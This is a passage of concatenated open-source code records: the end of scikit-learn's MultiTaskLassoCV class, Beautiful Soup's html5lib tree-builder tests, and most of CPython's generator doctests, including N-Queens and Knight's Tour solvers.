alpha_ : float The amount of penalization chosen by cross validation mse_path_ : array, shape (n_alphas, n_folds) mean square error for the test set on each fold, varying alpha alphas_ : numpy array, shape (n_alphas,) The grid of alphas used for fitting. n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance for the optimal alpha. See also -------- MultiTaskElasticNet ElasticNetCV MultiTaskElasticNetCV Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ path = staticmethod(lasso_path) def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, max_iter=1000, tol=1e-4, copy_X=True, cv=None, verbose=False, n_jobs=1, random_state=None, selection='cyclic'): super(MultiTaskLassoCV, self).__init__( eps=eps, n_alphas=n_alphas, alphas=alphas, fit_intercept=fit_intercept, normalize=normalize, max_iter=max_iter, tol=tol, copy_X=copy_X, cv=cv, verbose=verbose, n_jobs=n_jobs, random_state=random_state, selection=selection)
roderickvd/nzbToMedia
refs/heads/master
libs/bs4/tests/test_html5lib.py
293
"""Tests to ensure that the html5lib tree builder generates good trees.""" import warnings try: from bs4.builder import HTML5TreeBuilder HTML5LIB_PRESENT = True except ImportError, e: HTML5LIB_PRESENT = False from bs4.element import SoupStrainer from bs4.testing import ( HTML5TreeBuilderSmokeTest, SoupTest, skipIf, ) @skipIf( not HTML5LIB_PRESENT, "html5lib seems not to be present, not testing its tree builder.") class HTML5LibBuilderSmokeTest(SoupTest, HTML5TreeBuilderSmokeTest): """See ``HTML5TreeBuilderSmokeTest``.""" @property def default_builder(self): return HTML5TreeBuilder() def test_soupstrainer(self): # The html5lib tree builder does not support SoupStrainers. strainer = SoupStrainer("b") markup = "<p>A <b>bold</b> statement.</p>" with warnings.catch_warnings(record=True) as w: soup = self.soup(markup, parse_only=strainer) self.assertEqual( soup.decode(), self.document_for(markup)) self.assertTrue( "the html5lib tree builder doesn't support parse_only" in str(w[0].message)) def test_correctly_nested_tables(self): """html5lib inserts <tbody> tags where other parsers don't.""" markup = ('<table id="1">' '<tr>' "<td>Here's another table:" '<table id="2">' '<tr><td>foo</td></tr>' '</table></td>') self.assertSoupEquals( markup, '<table id="1"><tbody><tr><td>Here\'s another table:' '<table id="2"><tbody><tr><td>foo</td></tr></tbody></table>' '</td></tr></tbody></table>') self.assertSoupEquals( "<table><thead><tr><td>Foo</td></tr></thead>" "<tbody><tr><td>Bar</td></tr></tbody>" "<tfoot><tr><td>Baz</td></tr></tfoot></table>") def test_xml_declaration_followed_by_doctype(self): markup = '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html> <html> <head> </head> <body> <p>foo</p> </body> </html>''' soup = self.soup(markup) # Verify that we can reach the <p> tag; this means the tree is connected. 
self.assertEqual(b"<p>foo</p>", soup.p.encode()) def test_reparented_markup(self): markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>' soup = self.soup(markup) self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p></body>", soup.body.decode()) self.assertEqual(2, len(soup.find_all('p'))) def test_reparented_markup_ends_with_whitespace(self): markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>\n' soup = self.soup(markup) self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p>\n</body>", soup.body.decode()) self.assertEqual(2, len(soup.find_all('p')))
kanagasabapathi/python-for-android
refs/heads/master
python3-alpha/python3-src/Lib/test/test_generators.py
49
tutorial_tests = """ Let's try a simple generator: >>> def f(): ... yield 1 ... yield 2 >>> for i in f(): ... print(i) 1 2 >>> g = f() >>> next(g) 1 >>> next(g) 2 "Falling off the end" stops the generator: >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 2, in g StopIteration "return" also stops the generator: >>> def f(): ... yield 1 ... return ... yield 2 # never reached ... >>> g = f() >>> next(g) 1 >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 3, in f StopIteration >>> next(g) # once stopped, can't be resumed Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration "raise StopIteration" stops the generator too: >>> def f(): ... yield 1 ... raise StopIteration ... yield 2 # never reached ... >>> g = f() >>> next(g) 1 >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration However, they are not exactly equivalent: >>> def g1(): ... try: ... return ... except: ... yield 1 ... >>> list(g1()) [] >>> def g2(): ... try: ... raise StopIteration ... except: ... yield 42 >>> print(list(g2())) [42] This may be surprising at first: >>> def g3(): ... try: ... return ... finally: ... yield 1 ... >>> list(g3()) [1] Let's create an alternate range() function implemented as a generator: >>> def yrange(n): ... for i in range(n): ... yield i ... >>> list(yrange(5)) [0, 1, 2, 3, 4] Generators always return to the most recent caller: >>> def creator(): ... r = yrange(5) ... print("creator", next(r)) ... return r ... >>> def caller(): ... r = creator() ... for i in r: ... print("caller", i) ... >>> caller() creator 0 caller 1 caller 2 caller 3 caller 4 Generators can call other generators: >>> def zrange(n): ... for i in yrange(n): ... yield i ... >>> list(zrange(5)) [0, 1, 2, 3, 4] """ # The examples from PEP 255. 
pep_tests = """ Specification: Yield Restriction: A generator cannot be resumed while it is actively running: >>> def g(): ... i = next(me) ... yield i >>> me = g() >>> next(me) Traceback (most recent call last): ... File "<string>", line 2, in g ValueError: generator already executing Specification: Return Note that return isn't always equivalent to raising StopIteration: the difference lies in how enclosing try/except constructs are treated. For example, >>> def f1(): ... try: ... return ... except: ... yield 1 >>> print(list(f1())) [] because, as in any function, return simply exits, but >>> def f2(): ... try: ... raise StopIteration ... except: ... yield 42 >>> print(list(f2())) [42] because StopIteration is captured by a bare "except", as is any exception. Specification: Generators and Exception Propagation >>> def f(): ... return 1//0 >>> def g(): ... yield f() # the zero division exception propagates ... yield 42 # and we'll never get here >>> k = g() >>> next(k) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 2, in g File "<stdin>", line 2, in f ZeroDivisionError: integer division or modulo by zero >>> next(k) # and the generator cannot be resumed Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration >>> Specification: Try/Except/Finally >>> def f(): ... try: ... yield 1 ... try: ... yield 2 ... 1//0 ... yield 3 # never get here ... except ZeroDivisionError: ... yield 4 ... yield 5 ... raise ... except: ... yield 6 ... yield 7 # the "raise" above stops this ... except: ... yield 8 ... yield 9 ... try: ... x = 12 ... finally: ... yield 10 ... yield 11 >>> print(list(f())) [1, 2, 4, 5, 8, 9, 10, 11] >>> Guido's binary tree example. >>> # A binary tree class. >>> class Tree: ... ... def __init__(self, label, left=None, right=None): ... self.label = label ... self.left = left ... self.right = right ... ... def __repr__(self, level=0, indent=" "): ... s = level*indent + repr(self.label) ... 
if self.left: ... s = s + "\\n" + self.left.__repr__(level+1, indent) ... if self.right: ... s = s + "\\n" + self.right.__repr__(level+1, indent) ... return s ... ... def __iter__(self): ... return inorder(self) >>> # Create a Tree from a list. >>> def tree(list): ... n = len(list) ... if n == 0: ... return [] ... i = n // 2 ... return Tree(list[i], tree(list[:i]), tree(list[i+1:])) >>> # Show it off: create a tree. >>> t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ") >>> # A recursive generator that generates Tree labels in in-order. >>> def inorder(t): ... if t: ... for x in inorder(t.left): ... yield x ... yield t.label ... for x in inorder(t.right): ... yield x >>> # Show it off: create a tree. >>> t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ") >>> # Print the nodes of the tree in in-order. >>> for x in t: ... print(' '+x, end='') A B C D E F G H I J K L M N O P Q R S T U V W X Y Z >>> # A non-recursive generator. >>> def inorder(node): ... stack = [] ... while node: ... while node.left: ... stack.append(node) ... node = node.left ... yield node.label ... while not node.right: ... try: ... node = stack.pop() ... except IndexError: ... return ... yield node.label ... node = node.right >>> # Exercise the non-recursive generator. >>> for x in t: ... print(' '+x, end='') A B C D E F G H I J K L M N O P Q R S T U V W X Y Z """ # Examples from Iterator-List and Python-Dev and c.l.py. email_tests = """ The difference between yielding None and returning it. >>> def g(): ... for i in range(3): ... yield None ... yield None ... return >>> list(g()) [None, None, None, None] Ensure that explicitly raising StopIteration acts like any other exception in try/except, not like a return. >>> def g(): ... yield 1 ... try: ... raise StopIteration ... except: ... yield 2 ... yield 3 >>> list(g()) [1, 2, 3] Next one was posted to c.l.py. >>> def gcomb(x, k): ... "Generate all combinations of k elements from list x." ... ... if k > len(x): ... return ... if k == 0: ... yield [] ... else: ... 
first, rest = x[0], x[1:] ... # A combination does or doesn't contain first. ... # If it does, the remainder is a k-1 comb of rest. ... for c in gcomb(rest, k-1): ... c.insert(0, first) ... yield c ... # If it doesn't contain first, it's a k comb of rest. ... for c in gcomb(rest, k): ... yield c >>> seq = list(range(1, 5)) >>> for k in range(len(seq) + 2): ... print("%d-combs of %s:" % (k, seq)) ... for c in gcomb(seq, k): ... print(" ", c) 0-combs of [1, 2, 3, 4]: [] 1-combs of [1, 2, 3, 4]: [1] [2] [3] [4] 2-combs of [1, 2, 3, 4]: [1, 2] [1, 3] [1, 4] [2, 3] [2, 4] [3, 4] 3-combs of [1, 2, 3, 4]: [1, 2, 3] [1, 2, 4] [1, 3, 4] [2, 3, 4] 4-combs of [1, 2, 3, 4]: [1, 2, 3, 4] 5-combs of [1, 2, 3, 4]: From the Iterators list, about the types of these things. >>> def g(): ... yield 1 ... >>> type(g) <class 'function'> >>> i = g() >>> type(i) <class 'generator'> >>> [s for s in dir(i) if not s.startswith('_')] ['close', 'gi_code', 'gi_frame', 'gi_running', 'send', 'throw'] >>> print(i.__next__.__doc__) x.__next__() <==> next(x) >>> iter(i) is i True >>> import types >>> isinstance(i, types.GeneratorType) True And more, added later. >>> i.gi_running 0 >>> type(i.gi_frame) <class 'frame'> >>> i.gi_running = 42 Traceback (most recent call last): ... AttributeError: readonly attribute >>> def g(): ... yield me.gi_running >>> me = g() >>> me.gi_running 0 >>> next(me) 1 >>> me.gi_running 0 A clever union-find implementation from c.l.py, due to David Eppstein. Sent: Friday, June 29, 2001 12:16 PM To: python-list@python.org Subject: Re: PEP 255: Simple Generators >>> class disjointSet: ... def __init__(self, name): ... self.name = name ... self.parent = None ... self.generator = self.generate() ... ... def generate(self): ... while not self.parent: ... yield self ... for x in self.parent.generator: ... yield x ... ... def find(self): ... return next(self.generator) ... ... def union(self, parent): ... if self.parent: ... raise ValueError("Sorry, I'm not a root!") ... 
self.parent = parent ... ... def __str__(self): ... return self.name >>> names = "ABCDEFGHIJKLM" >>> sets = [disjointSet(name) for name in names] >>> roots = sets[:] >>> import random >>> gen = random.Random(42) >>> while 1: ... for s in sets: ... print(" %s->%s" % (s, s.find()), end='') ... print() ... if len(roots) > 1: ... s1 = gen.choice(roots) ... roots.remove(s1) ... s2 = gen.choice(roots) ... s1.union(s2) ... print("merged", s1, "into", s2) ... else: ... break A->A B->B C->C D->D E->E F->F G->G H->H I->I J->J K->K L->L M->M merged K into B A->A B->B C->C D->D E->E F->F G->G H->H I->I J->J K->B L->L M->M merged A into F A->F B->B C->C D->D E->E F->F G->G H->H I->I J->J K->B L->L M->M merged E into F A->F B->B C->C D->D E->F F->F G->G H->H I->I J->J K->B L->L M->M merged D into C A->F B->B C->C D->C E->F F->F G->G H->H I->I J->J K->B L->L M->M merged M into C A->F B->B C->C D->C E->F F->F G->G H->H I->I J->J K->B L->L M->C merged J into B A->F B->B C->C D->C E->F F->F G->G H->H I->I J->B K->B L->L M->C merged B into C A->F B->C C->C D->C E->F F->F G->G H->H I->I J->C K->C L->L M->C merged F into G A->G B->C C->C D->C E->G F->G G->G H->H I->I J->C K->C L->L M->C merged L into C A->G B->C C->C D->C E->G F->G G->G H->H I->I J->C K->C L->C M->C merged G into I A->I B->C C->C D->C E->I F->I G->I H->H I->I J->C K->C L->C M->C merged I into H A->H B->C C->C D->C E->H F->H G->H H->H I->H J->C K->C L->C M->C merged C into H A->H B->H C->H D->H E->H F->H G->H H->H I->H J->H K->H L->H M->H """ # Emacs turd ' # Fun tests (for sufficiently warped notions of "fun"). fun_tests = """ Build up to a recursive Sieve of Eratosthenes generator. >>> def firstn(g, n): ... return [next(g) for i in range(n)] >>> def intsfrom(i): ... while 1: ... yield i ... i += 1 >>> firstn(intsfrom(5), 7) [5, 6, 7, 8, 9, 10, 11] >>> def exclude_multiples(n, ints): ... for i in ints: ... if i % n: ... yield i >>> firstn(exclude_multiples(3, intsfrom(1)), 6) [1, 2, 4, 5, 7, 8] >>> def sieve(ints): ... 
prime = next(ints) ... yield prime ... not_divisible_by_prime = exclude_multiples(prime, ints) ... for p in sieve(not_divisible_by_prime): ... yield p >>> primes = sieve(intsfrom(2)) >>> firstn(primes, 20) [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71] Another famous problem: generate all integers of the form 2**i * 3**j * 5**k in increasing order, where i,j,k >= 0. Trickier than it may look at first! Try writing it without generators, and correctly, and without generating 3 internal results for each result output. >>> def times(n, g): ... for i in g: ... yield n * i >>> firstn(times(10, intsfrom(1)), 10) [10, 20, 30, 40, 50, 60, 70, 80, 90, 100] >>> def merge(g, h): ... ng = next(g) ... nh = next(h) ... while 1: ... if ng < nh: ... yield ng ... ng = next(g) ... elif ng > nh: ... yield nh ... nh = next(h) ... else: ... yield ng ... ng = next(g) ... nh = next(h) The following works, but is doing a whale of a lot of redundant work -- it's not clear how to get the internal uses of m235 to share a single generator. Note that me_times2 (etc) each need to see every element in the result sequence. So this is an example where lazy lists are more natural (you can look at the head of a lazy list any number of times). >>> def m235(): ... yield 1 ... me_times2 = times(2, m235()) ... me_times3 = times(3, m235()) ... me_times5 = times(5, m235()) ... for i in merge(merge(me_times2, ... me_times3), ... me_times5): ... yield i Don't print "too many" of these -- the implementation above is extremely inefficient: each call of m235() leads to 3 recursive calls, and in turn each of those 3 more, and so on, and so on, until we've descended enough levels to satisfy the print stmts. Very odd: when I printed 5 lines of results below, this managed to screw up Win98's malloc in "the usual" way, i.e. the heap grew over 4Mb so Win98 started fragmenting address space, and it *looked* like a very slow leak. >>> result = m235() >>> for i in range(3): ... 
print(firstn(result, 15)) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] Heh. Here's one way to get a shared list, complete with an excruciating namespace renaming trick. The *pretty* part is that the times() and merge() functions can be reused as-is, because they only assume their stream arguments are iterable -- a LazyList is the same as a generator to times(). >>> class LazyList: ... def __init__(self, g): ... self.sofar = [] ... self.fetch = g.__next__ ... ... def __getitem__(self, i): ... sofar, fetch = self.sofar, self.fetch ... while i >= len(sofar): ... sofar.append(fetch()) ... return sofar[i] >>> def m235(): ... yield 1 ... # Gack: m235 below actually refers to a LazyList. ... me_times2 = times(2, m235) ... me_times3 = times(3, m235) ... me_times5 = times(5, m235) ... for i in merge(merge(me_times2, ... me_times3), ... me_times5): ... yield i Print as many of these as you like -- *this* implementation is memory- efficient. >>> m235 = LazyList(m235()) >>> for i in range(5): ... print([m235[j] for j in range(15*i, 15*(i+1))]) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] [200, 216, 225, 240, 243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384] [400, 405, 432, 450, 480, 486, 500, 512, 540, 576, 600, 625, 640, 648, 675] Ye olde Fibonacci generator, LazyList style. >>> def fibgen(a, b): ... ... def sum(g, h): ... while 1: ... yield next(g) + next(h) ... ... def tail(g): ... next(g) # throw first away ... for x in g: ... yield x ... ... yield a ... yield b ... for s in sum(iter(fib), ... tail(iter(fib))): ... 
yield s >>> fib = LazyList(fibgen(1, 2)) >>> firstn(iter(fib), 17) [1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584] Running after your tail with itertools.tee (new in version 2.4) The algorithms "m235" (Hamming) and Fibonacci presented above are both examples of a whole family of FP (functional programming) algorithms where a function produces and returns a list while the production algorithm suppose the list as already produced by recursively calling itself. For these algorithms to work, they must: - produce at least a first element without presupposing the existence of the rest of the list - produce their elements in a lazy manner To work efficiently, the beginning of the list must not be recomputed over and over again. This is ensured in most FP languages as a built-in feature. In python, we have to explicitly maintain a list of already computed results and abandon genuine recursivity. This is what had been attempted above with the LazyList class. One problem with that class is that it keeps a list of all of the generated results and therefore continually grows. This partially defeats the goal of the generator concept, viz. produce the results only as needed instead of producing them all and thereby wasting memory. Thanks to itertools.tee, it is now clear "how to get the internal uses of m235 to share a single generator". >>> from itertools import tee >>> def m235(): ... def _m235(): ... yield 1 ... for n in merge(times(2, m2), ... merge(times(3, m3), ... times(5, m5))): ... yield n ... m1 = _m235() ... m2, m3, m5, mRes = tee(m1, 4) ... return mRes >>> it = m235() >>> for i in range(5): ... 
print(firstn(it, 15)) [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24] [25, 27, 30, 32, 36, 40, 45, 48, 50, 54, 60, 64, 72, 75, 80] [81, 90, 96, 100, 108, 120, 125, 128, 135, 144, 150, 160, 162, 180, 192] [200, 216, 225, 240, 243, 250, 256, 270, 288, 300, 320, 324, 360, 375, 384] [400, 405, 432, 450, 480, 486, 500, 512, 540, 576, 600, 625, 640, 648, 675] The "tee" function does just what we want. It internally keeps a generated result for as long as it has not been "consumed" from all of the duplicated iterators, whereupon it is deleted. You can therefore print the hamming sequence during hours without increasing memory usage, or very little. The beauty of it is that recursive running-after-their-tail FP algorithms are quite straightforwardly expressed with this Python idiom. Ye olde Fibonacci generator, tee style. >>> def fib(): ... ... def _isum(g, h): ... while 1: ... yield next(g) + next(h) ... ... def _fib(): ... yield 1 ... yield 2 ... next(fibTail) # throw first away ... for res in _isum(fibHead, fibTail): ... yield res ... ... realfib = _fib() ... fibHead, fibTail, fibRes = tee(realfib, 3) ... return fibRes >>> firstn(fib(), 17) [1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597, 2584] """ # syntax_tests mostly provokes SyntaxErrors. Also fiddling with #if 0 # hackery. syntax_tests = """ >>> def f(): ... return 22 ... yield 1 Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator >>> def f(): ... yield 1 ... return 22 Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator "return None" is not the same as "return" in a generator: >>> def f(): ... yield 1 ... return None Traceback (most recent call last): .. SyntaxError: 'return' with argument inside generator These are fine: >>> def f(): ... yield 1 ... return >>> def f(): ... try: ... yield 1 ... finally: ... pass >>> def f(): ... try: ... try: ... 1//0 ... except ZeroDivisionError: ... yield 666 ... except: ... 
pass ... finally: ... pass >>> def f(): ... try: ... try: ... yield 12 ... 1//0 ... except ZeroDivisionError: ... yield 666 ... except: ... try: ... x = 12 ... finally: ... yield 12 ... except: ... return >>> list(f()) [12, 666] >>> def f(): ... yield >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... yield >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... yield 1 >>> type(f()) <class 'generator'> >>> def f(): ... if "": ... yield None >>> type(f()) <class 'generator'> >>> def f(): ... return ... try: ... if x==4: ... pass ... elif 0: ... try: ... 1//0 ... except SyntaxError: ... pass ... else: ... if 0: ... while 12: ... x += 1 ... yield 2 # don't blink ... f(a, b, c, d, e) ... else: ... pass ... except: ... x = 1 ... return >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... def g(): ... yield 1 ... >>> type(f()) <class 'NoneType'> >>> def f(): ... if 0: ... class C: ... def __init__(self): ... yield 1 ... def f(self): ... yield 2 >>> type(f()) <class 'NoneType'> >>> def f(): ... if 0: ... return ... if 0: ... yield 2 >>> type(f()) <class 'generator'> >>> def f(): ... if 0: ... lambda x: x # shouldn't trigger here ... return # or here ... def f(i): ... return 2*i # or here ... if 0: ... return 3 # but *this* sucks (line 8) ... if 0: ... yield 2 # because it's a generator (line 10) Traceback (most recent call last): SyntaxError: 'return' with argument inside generator This one caused a crash (see SF bug 567538): >>> def f(): ... for i in range(3): ... try: ... continue ... finally: ... yield i ... >>> g = f() >>> print(next(g)) 0 >>> print(next(g)) 1 >>> print(next(g)) 2 >>> print(next(g)) Traceback (most recent call last): StopIteration Test the gi_code attribute >>> def f(): ... yield 5 ... >>> g = f() >>> g.gi_code is f.__code__ True >>> next(g) 5 >>> next(g) Traceback (most recent call last): StopIteration >>> g.gi_code is f.__code__ True Test the __name__ attribute and the repr() >>> def f(): ... yield 5 ... 
>>> g = f() >>> g.__name__ 'f' >>> repr(g) # doctest: +ELLIPSIS '<generator object f at ...>' Lambdas shouldn't have their usual return behavior. >>> x = lambda: (yield 1) >>> list(x()) [1] >>> x = lambda: ((yield 1), (yield 2)) >>> list(x()) [1, 2] """ # conjoin is a simple backtracking generator, named in honor of Icon's # "conjunction" control structure. Pass a list of no-argument functions # that return iterable objects. Easiest to explain by example: assume the # function list [x, y, z] is passed. Then conjoin acts like: # # def g(): # values = [None] * 3 # for values[0] in x(): # for values[1] in y(): # for values[2] in z(): # yield values # # So some 3-lists of values *may* be generated, each time we successfully # get into the innermost loop. If an iterator fails (is exhausted) before # then, it "backtracks" to get the next value from the nearest enclosing # iterator (the one "to the left"), and starts all over again at the next # slot (pumps a fresh iterator). Of course this is most useful when the # iterators have side-effects, so that which values *can* be generated at # each slot depend on the values iterated at previous slots. def simple_conjoin(gs): values = [None] * len(gs) def gen(i): if i >= len(gs): yield values else: for values[i] in gs[i](): for x in gen(i+1): yield x for x in gen(0): yield x # That works fine, but recursing a level and checking i against len(gs) for # each item produced is inefficient. By doing manual loop unrolling across # generator boundaries, it's possible to eliminate most of that overhead. # This isn't worth the bother *in general* for generators, but conjoin() is # a core building block for some CPU-intensive generator applications. def conjoin(gs): n = len(gs) values = [None] * n # Do one loop nest at time recursively, until the # of loop nests # remaining is divisible by 3. 
def gen(i): if i >= n: yield values elif (n-i) % 3: ip1 = i+1 for values[i] in gs[i](): for x in gen(ip1): yield x else: for x in _gen3(i): yield x # Do three loop nests at a time, recursing only if at least three more # remain. Don't call directly: this is an internal optimization for # gen's use. def _gen3(i): assert i < n and (n-i) % 3 == 0 ip1, ip2, ip3 = i+1, i+2, i+3 g, g1, g2 = gs[i : ip3] if ip3 >= n: # These are the last three, so we can yield values directly. for values[i] in g(): for values[ip1] in g1(): for values[ip2] in g2(): yield values else: # At least 6 loop nests remain; peel off 3 and recurse for the # rest. for values[i] in g(): for values[ip1] in g1(): for values[ip2] in g2(): for x in _gen3(ip3): yield x for x in gen(0): yield x # And one more approach: For backtracking apps like the Knight's Tour # solver below, the number of backtracking levels can be enormous (one # level per square, for the Knight's Tour, so that e.g. a 100x100 board # needs 10,000 levels). In such cases Python is likely to run out of # stack space due to recursion. So here's a recursion-free version of # conjoin too. # NOTE WELL: This allows large problems to be solved with only trivial # demands on stack space. Without explicitly resumable generators, this is # much harder to achieve. OTOH, this is much slower (up to a factor of 2) # than the fancy unrolled recursive conjoin. def flat_conjoin(gs): # rename to conjoin to run tests with this instead n = len(gs) values = [None] * n iters = [None] * n _StopIteration = StopIteration # make local because caught a *lot* i = 0 while 1: # Descend. try: while i < n: it = iters[i] = gs[i]().__next__ values[i] = it() i += 1 except _StopIteration: pass else: assert i == n yield values # Backtrack until an older iterator can be resumed. i -= 1 while i >= 0: try: values[i] = iters[i]() # Success! Start fresh at next level. i += 1 break except _StopIteration: # Continue backtracking. 
i -= 1 else: assert i < 0 break # A conjoin-based N-Queens solver. class Queens: def __init__(self, n): self.n = n rangen = range(n) # Assign a unique int to each column and diagonal. # columns: n of those, range(n). # NW-SE diagonals: 2n-1 of these, i-j unique and invariant along # each, smallest i-j is 0-(n-1) = 1-n, so add n-1 to shift to 0- # based. # NE-SW diagonals: 2n-1 of these, i+j unique and invariant along # each, smallest i+j is 0, largest is 2n-2. # For each square, compute a bit vector of the columns and # diagonals it covers, and for each row compute a function that # generates the possiblities for the columns in that row. self.rowgenerators = [] for i in rangen: rowuses = [(1 << j) | # column ordinal (1 << (n + i-j + n-1)) | # NW-SE ordinal (1 << (n + 2*n-1 + i+j)) # NE-SW ordinal for j in rangen] def rowgen(rowuses=rowuses): for j in rangen: uses = rowuses[j] if uses & self.used == 0: self.used |= uses yield j self.used &= ~uses self.rowgenerators.append(rowgen) # Generate solutions. def solve(self): self.used = 0 for row2col in conjoin(self.rowgenerators): yield row2col def printsolution(self, row2col): n = self.n assert n == len(row2col) sep = "+" + "-+" * n print(sep) for i in range(n): squares = [" " for j in range(n)] squares[row2col[i]] = "Q" print("|" + "|".join(squares) + "|") print(sep) # A conjoin-based Knight's Tour solver. This is pretty sophisticated # (e.g., when used with flat_conjoin above, and passing hard=1 to the # constructor, a 200x200 Knight's Tour was found quickly -- note that we're # creating 10s of thousands of generators then!), and is lengthy. class Knights: def __init__(self, m, n, hard=0): self.m, self.n = m, n # solve() will set up succs[i] to be a list of square #i's # successors. succs = self.succs = [] # Remove i0 from each of its successor's successor lists, i.e. # successors can't go back to i0 again. Return 0 if we can # detect this makes a solution impossible, else return 1. 
def remove_from_successors(i0, len=len): # If we remove all exits from a free square, we're dead: # even if we move to it next, we can't leave it again. # If we create a square with one exit, we must visit it next; # else somebody else will have to visit it, and since there's # only one adjacent, there won't be a way to leave it again. # Finelly, if we create more than one free square with a # single exit, we can only move to one of them next, leaving # the other one a dead end. ne0 = ne1 = 0 for i in succs[i0]: s = succs[i] s.remove(i0) e = len(s) if e == 0: ne0 += 1 elif e == 1: ne1 += 1 return ne0 == 0 and ne1 < 2 # Put i0 back in each of its successor's successor lists. def add_to_successors(i0): for i in succs[i0]: succs[i].append(i0) # Generate the first move. def first(): if m < 1 or n < 1: return # Since we're looking for a cycle, it doesn't matter where we # start. Starting in a corner makes the 2nd move easy. corner = self.coords2index(0, 0) remove_from_successors(corner) self.lastij = corner yield corner add_to_successors(corner) # Generate the second moves. def second(): corner = self.coords2index(0, 0) assert self.lastij == corner # i.e., we started in the corner if m < 3 or n < 3: return assert len(succs[corner]) == 2 assert self.coords2index(1, 2) in succs[corner] assert self.coords2index(2, 1) in succs[corner] # Only two choices. Whichever we pick, the other must be the # square picked on move m*n, as it's the only way to get back # to (0, 0). Save its index in self.final so that moves before # the last know it must be kept free. for i, j in (1, 2), (2, 1): this = self.coords2index(i, j) final = self.coords2index(3-i, 3-j) self.final = final remove_from_successors(this) succs[final].append(corner) self.lastij = this yield this succs[final].remove(corner) add_to_successors(this) # Generate moves 3 thru m*n-1. def advance(len=len): # If some successor has only one exit, must take it. # Else favor successors with fewer exits. 
candidates = [] for i in succs[self.lastij]: e = len(succs[i]) assert e > 0, "else remove_from_successors() pruning flawed" if e == 1: candidates = [(e, i)] break candidates.append((e, i)) else: candidates.sort() for e, i in candidates: if i != self.final: if remove_from_successors(i): self.lastij = i yield i add_to_successors(i) # Generate moves 3 thru m*n-1. Alternative version using a # stronger (but more expensive) heuristic to order successors. # Since the # of backtracking levels is m*n, a poor move early on # can take eons to undo. Smallest square board for which this # matters a lot is 52x52. def advance_hard(vmid=(m-1)/2.0, hmid=(n-1)/2.0, len=len): # If some successor has only one exit, must take it. # Else favor successors with fewer exits. # Break ties via max distance from board centerpoint (favor # corners and edges whenever possible). candidates = [] for i in succs[self.lastij]: e = len(succs[i]) assert e > 0, "else remove_from_successors() pruning flawed" if e == 1: candidates = [(e, 0, i)] break i1, j1 = self.index2coords(i) d = (i1 - vmid)**2 + (j1 - hmid)**2 candidates.append((e, -d, i)) else: candidates.sort() for e, d, i in candidates: if i != self.final: if remove_from_successors(i): self.lastij = i yield i add_to_successors(i) # Generate the last move. 
def last(): assert self.final in succs[self.lastij] yield self.final if m*n < 4: self.squaregenerators = [first] else: self.squaregenerators = [first, second] + \ [hard and advance_hard or advance] * (m*n - 3) + \ [last] def coords2index(self, i, j): assert 0 <= i < self.m assert 0 <= j < self.n return i * self.n + j def index2coords(self, index): assert 0 <= index < self.m * self.n return divmod(index, self.n) def _init_board(self): succs = self.succs del succs[:] m, n = self.m, self.n c2i = self.coords2index offsets = [( 1, 2), ( 2, 1), ( 2, -1), ( 1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2)] rangen = range(n) for i in range(m): for j in rangen: s = [c2i(i+io, j+jo) for io, jo in offsets if 0 <= i+io < m and 0 <= j+jo < n] succs.append(s) # Generate solutions. def solve(self): self._init_board() for x in conjoin(self.squaregenerators): yield x def printsolution(self, x): m, n = self.m, self.n assert len(x) == m*n w = len(str(m*n)) format = "%" + str(w) + "d" squares = [[None] * n for i in range(m)] k = 1 for i in x: i1, j1 = self.index2coords(i) squares[i1][j1] = format % k k += 1 sep = "+" + ("-" * w + "+") * n print(sep) for i in range(m): row = squares[i] print("|" + "|".join(row) + "|") print(sep) conjoin_tests = """ Generate the 3-bit binary numbers in order. This illustrates dumbest- possible use of conjoin, just to generate the full cross-product. >>> for c in conjoin([lambda: iter((0, 1))] * 3): ... print(c) [0, 0, 0] [0, 0, 1] [0, 1, 0] [0, 1, 1] [1, 0, 0] [1, 0, 1] [1, 1, 0] [1, 1, 1] For efficiency in typical backtracking apps, conjoin() yields the same list object each time. So if you want to save away a full account of its generated sequence, you need to copy its results. >>> def gencopy(iterator): ... for x in iterator: ... yield x[:] >>> for n in range(10): ... all = list(gencopy(conjoin([lambda: iter((0, 1))] * n))) ... 
